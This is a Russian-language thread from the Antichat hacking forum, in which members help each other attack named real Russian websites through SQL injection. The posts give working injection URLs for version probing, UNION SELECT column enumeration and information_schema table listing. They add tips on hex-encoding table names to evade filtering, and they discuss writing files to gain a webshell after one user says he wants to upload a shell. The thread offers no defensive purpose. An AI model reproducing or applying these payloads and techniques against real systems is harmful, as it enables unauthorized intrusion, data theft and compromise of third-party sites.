16.01.2009, 23:36
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от pinky07
подозреваю, что это 3 версия мускуля
Правильно подозреваешь
http://www.rfrap.ru/site/index.php?p=16+and+substring(version(),1,1)=3
Вот материал по проведению инъекций в третьей ветке
https://forum.antichat.ru/showpost.php?p=565034&postcount=4
|
|
|
16.01.2009, 20:59
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами:
9367310
Репутация:
52
|
|
http://www.rncb.ru/print_view.php?id=450&fpath=2+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13+--+
|
|
|
|
16.01.2009, 21:00
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами:
9361826
Репутация:
115
|
|
используй HEX для кодирования имен таблиц. То есть у себя на компе делаешь
Код:
SELECT HEX('tablename')
и результат подставляешь в запрос, не забыв подставить 0x в начало.. Получится чтото вроде 0x35E45F337D |
|
|
|
16.01.2009, 21:42
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Сообщение от prescott
используй HEX для кодирования имен таблиц. То есть у себя на компе делаешь
Код:
SELECT HEX('tablename')
и результат подставляешь в запрос, не забыв подставить 0x в начало.. Получится чтото вроде 0x35E45F337Dили же просто используете php функцию =)
echo "0x".bin2hex("что надо захекстить");
|
|
|
|
16.01.2009, 21:02
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами:
9326973
Репутация:
-25
|
|
помогите разобраться!
вот раскрутил скулу:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables/**/
хочу залить shell через форум!
http://15rus.ru/forum/
Не могу понять где здесь таблицы форума???
|
|
|
|
16.01.2009, 21:15
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
Сообщение от geforce
помогите разобраться!
вот раскрутил скулу:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables/**/
хочу залить shell через форум!
http://15rus.ru/forum/
Не могу понять где здесь таблицы форума???
По форуму видно, что это phpbb. Какая версия я хз, с этим форумом мало знаком. Вот 3 таблицы:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables+where+table_name+like+0x257 068706262257573657273--
какая-то из них нужная.
зы: админы того сайта просто ппц - кучу софта понаставили, помойка просто)
|
|
|
|
16.01.2009, 21:44
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
1. Есть туча сайтов, которые хексят.
2. Вы вообще ссылку смотрели?
3. Есть табла mysql.user.. но...
|
|
|
|
16.01.2009, 21:58
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
MirA
Забавно, действительно фильтрация "_"
Есть очень большая вероятность того, что user под которым работает база, file_priv=Y
http://www.rncb.ru/print_view.php?id=450&fpath=-2+union+select+1,2,3,UNHEX(HEX(user())),5,6,7,8,9, 10,11,12,13+from+mysql.user+--+
root@localhost
Прочитать файлы мы не сможем, т.к LOAD _FILE, и посмотреть тоже , т.к file _priv, а вот записать ... 
Тоесть ищем папку на запись, и пробуем
PS
prescott, wildshaman Зачем вообще это писать?
|
|
|
|
16.01.2009, 22:57
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами:
9367310
Репутация:
52
|
|
Скажите что за ошибка 1 - Can't create/write to file '/home/localhost/www/1.txt' (Errcode: 2)
з.ы. в гугл не посылать,парсил)
|
|
|
|
16.01.2009, 23:06
|
|
Новичок
Регистрация: 07.09.2008
Сообщений: 26
С нами:
9302190
Репутация:
26
|
|
Сообщение от MirA
Скажите что за ошибка 1 - Can't create/write to file '/home/localhost/www/1.txt' (Errcode: 2)
з.ы. в гугл не посылать,парсил)
нет прав на запись или путь не правильный
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
